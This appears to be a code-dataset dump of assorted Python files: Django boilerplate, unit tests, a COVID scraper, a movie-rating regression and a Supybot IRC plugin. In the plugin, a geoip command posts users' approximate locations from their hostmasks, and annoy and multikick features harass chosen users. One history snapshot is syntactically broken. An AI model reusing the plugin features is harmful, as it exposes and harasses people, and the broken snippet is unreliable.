blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
5
283
content_id
stringlengths
40
40
detected_licenses
sequencelengths
0
41
license_type
stringclasses
2 values
repo_name
stringlengths
7
96
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
58 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
12.7k
662M
star_events_count
int64
0
35.5k
fork_events_count
int64
0
20.6k
gha_license_id
stringclasses
11 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
43 values
src_encoding
stringclasses
9 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
7
5.88M
extension
stringclasses
30 values
content
stringlengths
7
5.88M
authors
sequencelengths
1
1
author
stringlengths
0
73
3040254d9e002106e561ff20aa92098f99b38eee
6e77e4956005e3c0906dd9bc78e17026293d26a7
/manage.py
e7b080c346adb3fef80260f72f6ab15f452d031d
[]
no_license
lenines/djangoAD
191bdc4ebbdaa2ba5aa86e6bda55daff39cda4f6
11b8f1396e75592ff9c0d8f80610c87ea3d5c148
refs/heads/master
2020-06-04T22:39:54.490867
2014-05-14T18:35:25
2014-05-14T18:35:25
null
0
0
null
null
null
null
UTF-8
Python
false
false
251
py
#!/usr/bin/env python import os import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoAD.settings") from django.core.management import execute_from_command_line execute_from_command_line(sys.argv)
c4029a02879afac1579de64ece60784d40003ce5
7144d29d32343bd35a9fc9f169fed0eac9817a14
/banner/urls.py
cc4af951984d3a6f49e0bf9b27b2585654f2dee8
[]
no_license
spectatorqq/backstage-management-system
3f030f6f42311d81bdccb931581c02f2dca2171b
5086e97a65cead40e30426ed3c551c9378b57068
refs/heads/master
2020-09-20T04:00:43.718967
2019-11-27T08:42:12
2019-11-27T08:42:12
224,371,525
0
0
null
null
null
null
UTF-8
Python
false
false
222
py
from django.urls import path from banner import views urlpatterns = [ path('save_banner/', views.save_banner), path('show_current_page/', views.show_current_page), path('edit_carousel/', views.edit_carousel) ]
779f02e54dec316aae91f2c3db6455f6aea08182
4f718b014cd56215979a466c2ef3f2b6a82fbec1
/venv/Scripts/django-admin.py
600fb92973f9ab329362ba0bd7cd953c944b9382
[]
no_license
carminejcorbo/CS416FPDeployment
8a9bc9567ac8cc09a76b863ac76a6e8ccce87bbb
58ffb539ee24fc870cb89a74cf10d8dbef8aa34a
refs/heads/master
2023-02-23T03:52:28.575863
2023-01-04T19:00:41
2023-01-04T19:00:41
225,298,683
0
0
null
2023-02-07T21:23:27
2019-12-02T06:10:49
Python
UTF-8
Python
false
false
164
py
#!C:\Django Workspace\FreshShirts\venv\Scripts\python.exe from django.core import management if __name__ == "__main__": management.execute_from_command_line()
09976773a29250a9dfcd0ec12efbc745d44041f3
8750c559722f1dc63d31f2df293a7d4feb71fc09
/molotov/tests/test_slave.py
b6e47aa94ec42664075fa8dd0387322de09b4ed6
[ "Apache-2.0" ]
permissive
ymoran00/molotov
4f8017a90fd71c412f08355db98c72ea106ae8bf
2533d9653160845bd9a40defcf2e39810ad80215
refs/heads/master
2020-08-17T22:00:31.724709
2019-12-16T09:53:11
2019-12-16T09:53:11
215,716,155
0
0
Apache-2.0
2019-10-17T06:11:04
2019-10-17T06:11:03
null
UTF-8
Python
false
false
1,123
py
import os import pytest from molotov import __version__ from molotov.slave import main from molotov.tests.support import TestLoop, dedicatedloop, set_args _REPO = "https://github.com/loads/molotov" NO_INTERNET = os.environ.get("NO_INTERNET") is not None @pytest.mark.skipif(NO_INTERNET, reason="This test requires internet access") class TestSlave(TestLoop): @dedicatedloop def test_main(self): with set_args("moloslave", _REPO, "test") as out: main() if os.environ.get("TRAVIS") is not None: return output = out[0].read() self.assertTrue("Preparing 1 worker..." in output, output) self.assertTrue("OK" in output, output) @dedicatedloop def test_fail(self): with set_args("moloslave", _REPO, "fail"): self.assertRaises(Exception, main) @dedicatedloop def test_version(self): with set_args("moloslave", "--version") as out: try: main() except SystemExit: pass version = out[0].read().strip() self.assertTrue(version, __version__)
fdbc22579dbfd729a9c7cf738cd5dbd3f54004a6
2eae961147a9627a2b9c8449fa61cb7292ad4f6a
/test/test_migration_tax_return.py
5ba3369f4cd1b2ccbec9996ca4e1a387c408f536
[]
no_license
kgr-eureka/SageOneSDK
5a57cc6f62ffc571620ec67c79757dcd4e6feca7
798e240eb8f4a5718013ab74ec9a0f9f9054399a
refs/heads/master
2021-02-10T04:04:19.202332
2020-03-02T11:11:04
2020-03-02T11:11:04
244,350,350
0
0
null
null
null
null
UTF-8
Python
false
false
2,941
py
# coding: utf-8 """ Sage Business Cloud Accounting - Accounts Documentation of the Sage Business Cloud Accounting API. # noqa: E501 The version of the OpenAPI document: 3.1 Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import unittest import datetime import openapi_client from openapi_client.models.migration_tax_return import MigrationTaxReturn # noqa: E501 from openapi_client.rest import ApiException class TestMigrationTaxReturn(unittest.TestCase): """MigrationTaxReturn unit test stubs""" def setUp(self): pass def tearDown(self): pass def make_instance(self, include_optional): """Test MigrationTaxReturn include_option is a boolean, when False only required params are included, when True both required and optional params are included """ # model = openapi_client.models.migration_tax_return.MigrationTaxReturn() # noqa: E501 if include_optional : return MigrationTaxReturn( legacy_id = 56, id = '0', displayed_as = '0', path = '0', created_at = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'), updated_at = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'), from_date = datetime.datetime.strptime('1975-12-30', '%Y-%m-%d').date(), to_date = datetime.datetime.strptime('1975-12-30', '%Y-%m-%d').date(), tax_return_frequency = openapi_client.models.base.Base( legacy_id = 56, id = '0', displayed_as = '0', __path = '0', ), total_amount = 1.337, gb = openapi_client.models.gb_box_data.GBBoxData( box_1 = 1.337, box_2 = 1.337, box_3 = 1.337, box_4 = 1.337, box_5 = 1.337, box_6 = 1.337, box_7 = 1.337, box_8 = 1.337, box_9 = 1.337, ), ie = openapi_client.models.ie_box_data.IEBoxData( box_t1 = 1.337, box_t2 = 1.337, box_t3 = 1.337, box_t4 = 1.337, box_e1 = 1.337, box_e2 = 1.337, box_es1 = 1.337, box_es2 = 1.337, ) ) else : return MigrationTaxReturn( ) def testMigrationTaxReturn(self): """Test MigrationTaxReturn""" inst_req_only = self.make_instance(include_optional=False) inst_req_and_optional = self.make_instance(include_optional=True) if __name__ == '__main__': unittest.main()
35fbc68d5d7a092f36ad7817eb98d630e7078ff9
0698da9cae7d49222742d99daf3cc2b1b618501c
/LoadingBar.py
d8f2efa5e2d8382fc0915b4dc5228726b35e415c
[]
no_license
Ahmad-Kaafi/Facial-recognition-project
deee4a9b1dac278194e9a0ee54e74f1ef5acc2d1
90ce3ecfcbb86e44df8d79beab1d32018b499afb
refs/heads/master
2020-04-28T12:21:10.259381
2019-03-25T18:06:44
2019-03-25T18:06:44
175,272,845
0
0
null
null
null
null
UTF-8
Python
false
false
1,045
py
from tkinter import * from PIL import Image, ImageTk import ttk class DemoSplashScreen: def __init__(self, parent): self.parent = parent self.aturSplash() self.aturWindow() def aturSplash(self): self.gambar = Image.open("Green.png") self.imgSplash = ImageTk.PhotoImage(self.gambar) def aturWindow(self): lebar, tinggi = self.gambar.size setengahLebar = (self.parent.winfo_screenwidth()-lebar)//2 setengahTinggi = (self.parent.winfo_screenheight()-tinggi)//2 self.parent.geometry("%ix%i+%i+%i"%(lebar, tinggi, setengahLebar, setengahTinggi)) Label(self.parent, image = self.imgSplash).pack() if __name__ == "__main__": root = Tk() root.overrideredirect(True) progressbar = ttk.Progressbar(orient=HORIZONTAL, length=10000, mode='determinate') progressbar.pack(side="bottom") app = DemoSplashScreen(root) progressbar.start() root.after(1000, root.destroy) root.mainloop()
2f70ec7d64d3e0d0ef8953864baafa9c81fbf3fa
a34a580a222eeda9fb0230bdf257f2c65b7bc72a
/Develop/psjDevelop/searchFY.py
d0d7447db89fa782ccd7b50e6bd0b41aaf23b8fb
[]
no_license
diwangtseb/COVvisualization
3551dc91f8d2b71f631fdd52755d33be2c8d982c
ccc0c4aef1868b0ed6bf81406ce843045c426ff6
refs/heads/master
2022-04-09T09:06:43.878526
2020-03-08T07:24:04
2020-03-08T07:24:04
245,126,818
1
0
null
null
null
null
UTF-8
Python
false
false
2,190
py
import requests import json import time def GetDetailsData(url, headers): """ 爬取数据 :param url: :param headers: :return: """ r = requests.get(url, headers) res = json.loads(r.text) data_all = json.loads(res['data']) details = [] # 当日详细数据 update_time = data_all["lastUpdateTime"] data_country = data_all["areaTree"] # list 25个国家 data_province = data_country[0]["children"] # 中国各省 for pro_infos in data_province: province = pro_infos["name"] for city_infos in pro_infos["children"]: city = city_infos["name"] confirm = city_infos["total"]["confirm"] confirm_add = city_infos["today"]["confirm"] heal = city_infos["total"]["heal"] dead = city_infos["total"]["dead"] details.append([update_time, province, city, confirm, confirm_add, heal, dead]) return details def GetHistoryData(url, headers): """ 爬取数据 :param url: :param headers: :return: """ r = requests.get(url, headers) res = json.loads(r.text) data_all = json.loads(res['data']) history = {} # 历史数据 for i in data_all["chinaDayList"]: ds = "2020."+i["date"] tup = time.strptime(ds, "%Y.%m.%d") ds = time.strftime("%Y-%m-%d", tup) # 改变时间格式,由于数据库是datetime类型 confirm = i["confirm"] suspect = i["suspect"] heal = i["heal"] dead = i["dead"] history[ds] = {"confirm": confirm, "suspect": suspect, "heal": heal, "dead": dead, "confirm_add": 0, "suspect_add": 0, "heal_add": 0, "dead_add": 0} for i in data_all["chinaDayAddList"]: ds = "2020." + i["date"] tup = time.strptime(ds, "%Y.%m.%d") ds = time.strftime("%Y-%m-%d", tup) # 改变时间格式,由于数据库是datetime类型 confirm = i["confirm"] suspect = i["suspect"] heal = i["heal"] dead = i["dead"] history[ds].update({"confirm_add": confirm, "suspect_add": suspect, "heal_add": heal, "dead_add": dead}) return history
9dc27008134db0b35326d29d2df481dd1ecbf194
df241cd4aacb97fb5562a08ea4f912e9bd348657
/list5/toy_story.py
4e62b77003fe671c41f33424d82178dab0e6001f
[]
no_license
jakubdabek/python-uni
a8c7a323b1389fbe46e96b3c5fe9d4f1a5e825ec
0380bbce5f42a7b8cce2f678986c48b17b40f0a9
refs/heads/master
2022-11-18T18:59:55.229564
2020-07-05T17:42:12
2020-07-05T18:01:25
244,458,573
0
0
null
null
null
null
UTF-8
Python
false
false
3,467
py
from pathlib import Path from typing import Union, Optional, Tuple from sklearn.linear_model import LinearRegression from matplotlib import pyplot as plt from list4.overload import flatten import pandas as pd import numpy as np def load_data(file_name: str, *, dir_path: Optional[Union[Path, str]] = None) -> pd.DataFrame: if dir_path is None: dir_path = Path(__file__).parent / 'ml-latest-small' elif not isinstance(dir_path, Path): dir_path = Path(dir_path) return pd.read_csv(dir_path / file_name) def load_movies_find_id(title: str) -> Tuple[pd.Series, int]: movies = load_data("movies.csv") return movies["movieId"], movies.loc[movies["title"] == title, "movieId"][0] def relevant_data(ratings: pd.DataFrame, movie_ids: pd.Series, movie_id: Optional[int], max_movie_id: int) -> pd.DataFrame: ratings = ratings.drop('timestamp', axis=1) ratings = ratings[ratings['movieId'] <= max_movie_id] ratings = pd.pivot_table(ratings, index='userId', columns='movieId', values='rating') ratings = ratings.reindex(columns=movie_ids[movie_ids <= max_movie_id], copy=False) if movie_id is not None: ratings = ratings[ratings[movie_id].notna()] ratings.fillna(0.0, inplace=True) return ratings def linear_regression_dataset(ratings: pd.DataFrame, movie_id: int, *, inplace=False) -> Tuple[pd.DataFrame, pd.Series]: movie_ratings = ratings[movie_id] return ratings.drop(movie_id, axis=1, inplace=inplace), movie_ratings def main(): movie_ids, toy_story_id = load_movies_find_id("Toy Story (1995)") ratings = load_data("ratings.csv") max_movie_ids = pd.Series(flatten([10**i, 10**i * 2, 10**i * 5] for i in range(1, 6))) # max_movie_ids = [200] # max_movie_ids = [10, 100, 200, 500, 1000, 2500, 5000, 7500, 10000] bound = len(max_movie_ids[max_movie_ids < movie_ids.max()]) max_movie_ids = max_movie_ids[:bound+1] scores = [] for max_movie_id in max_movie_ids: data = relevant_data(ratings, movie_ids, toy_story_id, max_movie_id) (_, toy_story) = linear_regression_dataset(data, toy_story_id, inplace=True) lr: LinearRegression = LinearRegression().fit(data, toy_story) scores.append(lr.score(data, toy_story)) lr: LinearRegression = LinearRegression().fit(data[:-15], toy_story[:-15]) predictions: np.ndarray = lr.predict(data[-15:]) comparison = pd.DataFrame(dict(prediction=predictions, actual=toy_story[-15:])) movies_num = len(data.columns) print(f"{'='*8} {movies_num:6} movies {'='*8}") print(f"score: {lr.score(data[-15:], toy_story[-15:])}") print(comparison) print(scores) plt.title("model errors") plt.plot(max_movie_ids, scores) plt.xlabel("max movie id") plt.ylabel("error") plt.xscale('log') plt.show() plt.title("model errors") plt.plot([len(movie_ids[movie_ids < num]) for num in max_movie_ids], scores) plt.xlabel("number of movies") plt.ylabel("error") plt.xscale('log') plt.show() fig, ax = plt.subplots() ax.grid(True) xs = np.arange(len(toy_story[-15:])) + 1 ax.scatter(xs, predictions, c='coral', s=50, label='predicted') ax.scatter(xs, toy_story[-15:], c='green', s=30, label='expected') ax.set_title(f'Regression model prediction results ({movies_num} movies)') ax.legend() fig.tight_layout() plt.show() if __name__ == '__main__': main()
fe14e2773566f9017c9e893c04fd4ab422bb744a
5d707e323f945ed5183b342f67ee23072755ac08
/General/plugin.py
9081fa8c2a5cfcba4f10e2505fbbe5d77e79033c
[]
no_license
scornflakes/StewieGriffin
1826b3f52ee2274b2daf9f4b674340a8666b09bd
678db2f855550ae3eefb174e62b8b41fb63be359
refs/heads/master
2020-12-03T05:10:34.385457
2012-07-19T11:20:09
2012-07-19T11:20:09
null
0
0
null
null
null
null
UTF-8
Python
false
false
16,253
py
### # Copyright (c) 2011, Anthony Boot # All rights reserved. # # Licenced under GPLv2 # In brief, you may edit and distribute this as you want, provided the original # and modified sources are always available, this license notice is retained # and the original author is given full credit. # # There is no warrenty or guarentee, even if explicitly stated, that this # script is bug and malware free. It is your responsibility to check this # script and ensure its safety. # ### import supybot.utils as utils from supybot.commands import * import supybot.plugins as plugins import supybot.ircutils as ircutils import supybot.callbacks as callbacks import re,time,json,random import supybot.ircmsgs as ircmsgs import supybot.schedule as schedule class General(callbacks.PluginRegexp): """Some general purpose plugins.""" threaded=True # All regexps # regexps=['capsKick','selfCorrect','userCorrect','saveLast','greeter','awayMsgKicker','ytSnarfer','pasteSnarfer'] #Remove from this array to disable any regexps regexps=['selfCorrect','saveLast','greeter','awayMsgKicker','ytSnarfer','pasteSnarfer'] #Set to false to disable. consolechannel = "##sgoutput" buffer={} buffsize = 10 alpha=[] alpha+='QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm' annoyUser=[] random.seed() random.seed(random.random()) kickuser={} ##################### ### Commands ### ##################### def banmask(self, irc, msg, args, hostmask): """<nick|hostmask> Gets IP based hostmask for ban. """ failed = False ipre = re.compile(r"[0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]") bm = ipre.search(hostmask) try: bm = bm.group(0) bm = bm.replace(".","?") bm = bm.replace("-","?") irc.reply("*!*@*"+bm+"*") if(self.consolechannel): irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "BANMASK: *!*@*"+bm+"* returned for "+msg.nick)) except: hostmask = hostmask.split("@")[1] count=0; while count<10: hostmask = hostmask.replace(str(count),"?") count+=1 irc.reply("*!*@%s"%(hostmask),prefixNick=False) if(self.consolechannel): irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "BANMASK: *!*@%s returned for %s"%(hostmask,msg.nick))) banmask = wrap(banmask, ["hostmask"]) def rand(self,irc,msg,args,min,max,num): """[min] <max> [amount] Generates a random number from [min] to <max>, [amount] number of times.""" random.seed() random.seed(random.random()) if min > max and not num: num = max max = min min = 0 elif min > max: min,max = max,min if not num: num = 1 if not max: max = min min = 0 try: min = int(min) max = int(max) num = int(num) except: irc.error("Non numeric value(s) given") return 0 if num > 25: num = 25 x = 0; output = "" while x < num: output+=str(int(random.randint(min,max)))+" " x+=1 irc.reply(output) rand = wrap(rand,['int',optional('int'),optional('int')]) def stewieQuote(self, irc, msg, args): data = utils.web.getUrl("http://smacie.com/randomizer/family_guy/stewie_griffin.html") quote = data.split('<td valign="top"><big><big><big><font face="Comic Sans MS">')[1].split('</font></big></big></big></td>')[0] irc.reply(quote,prefixNick=False) # stewie = wrap(stewieQuote) def geoip(self,irc,msg,args,ohostmask): ohostmask = ohostmask.split('@')[1] if msg.nick.lower() in ohostmask: irc.reply('Unable to locate IP - User cloak detected'%ohostmask) return None ipre = re.compile(r"[0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]") hostmask = ipre.search(ohostmask) if hostmask: try: hostmask = hostmask.group(0) hostmask = hostmask.replace("-",".") except: hostmask = hostmask else: hostmask = ohostmask self.log.info("GeoIP: %s",hostmask) # if 'gateway' in hostmask: # hostmask = hostmask.split('ip.')[1] data = utils.web.getUrl('http://infosniper.net/?ip_address=%s'%hostmask) data = data.split('<!-- ################################################################################## -->')[5] data = re.split('<[^<>]+>|\\n|&nbsp;| | | ',data) x = 0 info = [] while x < len(data): if data[x] is '' or (len(data[x])<2 and ' ' in data[x]) : pass else: info+=[data[x]] x+=1 country = info[20] city = info[5] tz = info[27] to = info[30] if '-' not in to: to = '+%s'%to lat = info[13] lon = info[21] provider = info[11] if 'EUKHOST LTD' in provider: irc.reply("Unable to locate IP - Not found") return None tinyurl=utils.web.getUrl('http://tinyurl.com/api-create.php?url=http://maps.google.com/maps?q=%s,%s'%(lat,lon)) irc.reply('%s is near %s in %s (%s). The timezone is %s and is UTC/GMT%s. The provider is %s'%(hostmask,city,country,tinyurl,tz,to,provider)) return None geoip = wrap(geoip, ['hostmask']) def report(self,irc,msg,args,user,reason): """<User> <reason> Reports a user to Xenocide for him to act on when he comes back from afk or [NotHere].""" t = time.localtime() if int(t[2]) < 10: date = '0{0}'.format(t[2]) else: date = str(t[2]) if int(t[1]) < 10: month = '0{0}'.format(t[1]) else: month = str(t[1]) if int(t[3]) < 10: h = '0{0}'.format(t[3]) else: h = str(t[3]) logFile = '#powder.{0}-{1}-{2}.log'.format(date,month,t[0]) # irc.queueMsg(ircmsgs.privmsg('[NotHere]','User {0} has reported {1} for {2}. Log file is {3} and log time will be around {4}{5}'.format(msg.nick,user,reason,logFile,h,t[4]))) # irc.queueMsg(ircmsgs.privmsg('Xenocide','User {0} has reported {1} for {2}. Log file is {3} and log time will be around {4}{5}'.format(msg.nick,user,reason,logFile,h,t[4]))) irc.queueMsg(ircmsgs.privmsg('Memoserv','SEND Xenocide User {0} has reported {1} in {6} for {2}. Log file is {3} and log time will be around {4}{5}'.format(msg.nick,user,reason,logFile,h,t[4],msg.args[0]))) irc.replySuccess('Report sent.') report = wrap(report,['nick','text']) def bug(self,irc,msg,args,cmd): """<plugin> Use this command when Stewie has a bug. It places a note in the logs and sends Xenocide a message.""" self.log.error("****Error in {} reported by {}****".format(cmd,msg.nick)) irc.queueMsg(ircmsgs.privmsg('Memoserv','SEND Xenocide Bug found in {} by {}.'.format(cmd,msg.nick))) irc.replySuccess("Bug reported.") bug = wrap(bug,['something']) def kicked(self,irc,args,channel,nick): """[user] Shows how many times [user] has been kicked and by who. If [user] isn't provided, it returns infomation based on the caller.""" if not nick: ref = msg.nick.lower() else: ref = nick.lower() with open('KCOUNT','r') as f: kickdata = json.load(f) try: kickdata = kickdata[ref] reply = "{} has been kicked {} times, ".format(nick, kickdata['total']) for each in kickdata: if each in 'total': continue reply='{} {} by {},'.format(reply,kickdata[each],each) irc.reply(reply[:-1].replace("o","\xF0")) except: irc.reply('{} hasn\'t been kicked it seems.'.format(nick)) kicked = wrap(kicked,[optional('nick')]) def annoy(self,irc,msg,args,channel,nick,mins): """[channel] <nick> [mins] Makes stewie repeat everything the user says via a NOTICE for 2 minutes if [mins] is not specified. Blame Doxin for this.""" if not mins or mins == 0: mins = 2 expires = time.time()+(mins*60) try: def f(): self.annoyUser.pop(self.annoyUser.index(nick.lower())) self.log.info('ANNOY -> No longer annoying {}'.format(nick)) schedule.addEvent(f,expires) except: irc.error("I borked.") return 0 self.log.info('ANNOY -> Annoying {} for {} minutes'.format(nick,mins)) self.annoyUser+=[nick.lower()] annoy = wrap(annoy,['op','nickInChannel',optional('float')]) def justme(self,irc,msg,args,url): """<url> Checks if a website is up or down (using isup.me)""" try: url = url.split("//")[1] except: pass data = utils.web.getUrl('http://isup.me/{}'.format(url)) if 'is up.' in data: irc.reply("It's just you.") elif 'looks down' in data: irc.reply("It's down.") else: irc.error("Check URL and try again") justme = wrap(justme,(['something'])) def multikick(self,irc,msg,args,channel,nick,num,message): """<nick> <num> [message] Kicks <nick> every time [s]he talks up to <num> (max 10) times with [message]. Use #n to insert number of remaining kicks.""" if not channel: channel = "#powder" try: num = int(num) except: irc.error("Non-numeric value given.") return 0 if num > 10: num = 10 nick = nick.lower() self.kickuser[nick]={} self.kickuser[nick]['num'] = num if not message or message == "": message = "#n kick(s) remaining." self.kickuser[nick]['msg'] = message irc.queueMsg(ircmsgs.notice(msg.nick,("Kicking anyone with {} in their nick {} times.".format(nick,num)))) multikick = wrap(multikick, ['op',('haveOp','Kick a user'),'something','something',optional('text')]) ##################### ### RegExps ### ##################### def greeter(self, irc, msg, match): r"^(hello|hi|sup|hey|o?[bh]ai|wa+[sz]+(a+|u+)p?|Bye+|cya+|later[sz]?)[,. ]+(stewi?e?[griffin]?|bot|all|there)" if "," in match.group(0): hail = match.group(0).split(",")[0] elif "." in match.group(0): hail = match.group(0).split(".")[0] else: hail = match.group(0).split(" ")[0] self.log.info("Responding to %s with %s"%(msg.nick, hail)) if(self.consolechannel): irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "GREETER: Responding to %s with %s"%(msg.nick,hail))) irc.reply("%s, %s"%(hail,msg.nick), prefixNick=False) greeter = urlSnarfer(greeter) def awayMsgKicker(self, irc, msg, match): r"(is now (set as)? away [-:(] Reason |is no longer away : Gone for|is away:)" self.log.info("KICKING %s for away announce"%msg.nick) if(self.consolechannel):irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "KICK: %s for away announcement (automatic)"%msg.nick)) self._sendMsg(irc, ircmsgs.kick(msg.args[0], msg.nick, "Autokick: Spam (Away/Back Announce)")) awayMsgKicker = urlSnarfer(awayMsgKicker) def ytSnarfer(self, irc, msg, match): r".+youtube[.]com.+v=[0-9A-z\-_]{11}.*" self.log.info("ytSnarfer - Active") url = match.group(0) url = url.split(" ") for x in url: if "youtu" in x: url = url[url.index(x)] if url.find("v=") != -1 or url.find("&") != -1: if url.find("v=") != -1: url = url.split("v=")[1] if url.find("&") != -1: url = url.split("&")[0] else: url = url[-11:] self.log.info("ytSnarfer - Video ID: %s"%(url)) url="http://www.youtube.com/watch?v="+url data = utils.web.getUrl(url) # data = data.split("&#x202a;")[1].split("&#x202c;")[0] data = data.split('<title>')[1].split('</title>')[0].split('\n')[1].strip() data = data.replace("&quot;","\'").replace("&#39;", "'").replace("&amp;","&") irc.reply('Youtube video is "%s"'%data, prefixNick=False) self.log.info("ytSnarfer - Done.") if(self.consolechannel):irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "%s is %s"%(url,data))) return None ytSnarfer = urlSnarfer(ytSnarfer) def capsKick(self,irc,msg,match): r".+" data = match.group(0) data=data.strip('\x01ACTION').strip('\x01').strip('\x02').strip('\x07').strip('\x0f') knownCapsNicks = ['UBERNESS','ADL'] for each in knownCapsNicks: data = data.strip(each) data = list(data) if len(data) < 15: return 0 #Simon: Increased from 5 to 15, was making quite a few people unhappy length=0 caps=0 for each in data: if each in self.alpha: length+=1 if each in each.upper(): caps+=1 self.log.warning('{0} {1} {2}'.format(length,caps,int((float(caps)/length)*100))) if int((float(caps)/length)*100) > 60: self.log.info('Kicking {0} from {1} for caps rage.'.format(msg.nick,msg.args[0])) if(self.consolechannel):irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "KICK: %s for excessive caps. (automatic)"%msg.nick)) with open('KCOUNT','r') as f: kd = json.load(f) with open('KCOUNT','w') as f: try: kd[msg.nick.lower()]+=1 except: kd[msg.nick.lower()]=1 f.write(json.dumps(kd,sort_keys=True,indent=4)) reason='{0} - Kicked {1} time'.format('Excessive Caps',kd[msg.nick.lower()]) if kd[msg.nick.lower()] > 1: reason = '{0}s'.format(reason) del kd irc.queueMsg(ircmsgs.kick(msg.args[0], msg.nick, reason)) capsKick = urlSnarfer(capsKick) def pasteSnarfer(self,irc,msg,match): r"http://pastebin[.]com/[A-Za-z0-9]{8}" url = match.group(0) self.log.info('Pastbin Found - {0}'.format(url)) page = utils.web.getUrl(url) paste={} paste['name']=page.split('<h1>')[1].split('</h1>')[0] page = page.split('<div class="paste_box_line2">')[1].split('</div>')[0].strip().split('|') try: paste['by']=page[0].split('">')[1].split('</a>')[0] except: paste['by']=page[0].split(':')[1] paste['date']=page[1][1:-1] paste['syntax']=page[2].split('>')[1].split('<')[0] paste['size']=page[3].split(':')[1][1:-1] paste['expires']=page[5].split(':')[1][1:] if 'None' in paste['syntax']: paste['syntax']='Plain Text' irc.reply('Pastebin is {0} by {1} posted on {2} and is written in {3}. The paste is {4} and expires {5}'.format(paste['name'],paste['by'],paste['date'],paste['syntax'],paste['size'],paste['expires']),prefixNick=False) pasteSnarfer = urlSnarfer(pasteSnarfer) def selfCorrect(self,irc,msg,match): r"^s[/].*[/].*$" match = match.group(0) data = match.split('/') newData = [] x=0 while x < len(data): if '\\' in data[x]: newData+=['{0}/{1}'.format(data[x][:-1],data[x+1])] x+=2 else: newData+=[data[x]] x+=1 data=newData channel = msg.args[0] for each in self.buffer[channel]: if msg.nick in each[0]: output = each[1] if (len(data)-1)%2 is 0: x=1 while x < len(data): output=output.replace(data[x],data[x+1]) x+=2 self.log.info('Changing {0} to {1}'.format(each[1],output)) irc.reply('<{0}> {1}'.format(each[0],output),prefixNick=False) return 0 irc.error('Not found in buffer') selfCorrect = urlSnarfer(selfCorrect) def userCorrect(self,irc,msg,match): r"^u[/].*[/].*[/].*$" match = match.group(0) data = match.split('/') user = data[1] newData = [] x=0 while x < len(data): if '\\' in data[x]: newData+=['{0}/{1}'.format(data[x][:-1],data[x+1])] x+=2 else: newData+=[data[x]] x+=1 data=newData channel = msg.args[0] for each in self.buffer[channel]: print user.lower(),each[0].lower(),user.lower() is each[0].lower() if user.lower() in each[0].lower(): output = each[1] x=2 try: while x < len(data): output=output.replace(data[x],data[x+1]) x+=2 except: irc.error('Not enough arguments') self.log.info('Changing {0} to {1}'.format(each[1],output)) irc.reply('<{0}> {1}'.format(each[0],output),prefixNick=False) return 0 irc.error('Not found in buffer') userCorrect = urlSnarfer(userCorrect) def saveLast(self,irc,msg,match): r".+" channel = msg.args[0] try: self.buffer[channel] except: self.buffer[channel]=[] # Stuff for multikick for each in self.kickuser: if each in msg.nick.lower() and not self.kickuser[each]['num'] <= 0: irc.queueMsg(ircmsgs.ban(msg.args[0], msg.nick)) irc.queueMsg(ircmsgs.kick(msg.args[0], msg.nick, "{}".format(self.kickuser[each]['msg'].replace('#n',str(self.kickuser[each]['num']))))) self.kickuser[each]['num']-=1 def un(): irc.queueMsg(ircmsgs.unban(msg.args[0],msg.nick)) schedule.addEvent(un,time.time()+random.randint(30,120)) # END line = match.group(0).replace('\x01ACTION','*').strip('\x01') if msg.nick.lower() in self.annoyUser: def fu(): irc.queueMsg(ircmsgs.IrcMsg('NOTICE {} :\x02\x03{},{}{}'.format(msg.nick,random.randint(0,15),random.randint(0,15),line))) schedule.addEvent(fu,time.time()+random.randint(2,60)) self.buffer[channel].insert(0,[msg.nick,line]) if len(self.buffer[channel]) > self.buffsize: self.buffer[channel].pop(self.buffsize) return 1 saveLast = urlSnarfer(saveLast) ##################### ### Utilities ### ##################### def _sendMsg(self, irc, msg): irc.queueMsg(msg) irc.noReply() Class = General # vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
[ "antb@home" ]
antb@home
a83270f6d427c435029af0bb9b9d25f6cecb3ade
52b5773617a1b972a905de4d692540d26ff74926
/.history/containsDuplicate_20200907094218.py
458d5b60e59b1430badf47c2855449f00123736e
[]
no_license
MaryanneNjeri/pythonModules
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
f4e56b1e4dda2349267af634a46f6b9df6686020
refs/heads/master
2022-12-16T02:59:19.896129
2020-09-11T12:05:22
2020-09-11T12:05:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
287
py
def duplicate(nums,k,t): m = None n = None for i in range(len(nums)): for j in range(i+1,len(nums)): if abs(nums[i] - nums[j]) <= t: m = i n = j if nums[m] duplicate([1,2,3,1],3,0)
04dad20bfc067a777d7795de17a2478da378fbba
1b862f34c125ce200244dd79e4fda4b5b605ce2e
/.history/ML_T2_Validation_20210612125732.py
a3e3c1f66f5dc1ddb190e134a71155157cd4acab
[]
no_license
edwino26/CoreImages
26085a49cf1cb79442ae563a88354b2fdceace87
6bf6e68cac8ab36c87b1e6ea702bfe6882b0f40e
refs/heads/master
2023-06-22T12:53:37.344895
2021-07-21T04:31:44
2021-07-21T04:31:44
309,553,247
0
4
null
2021-04-29T23:23:15
2020-11-03T02:45:07
Lasso
UTF-8
Python
false
false
9,251
py
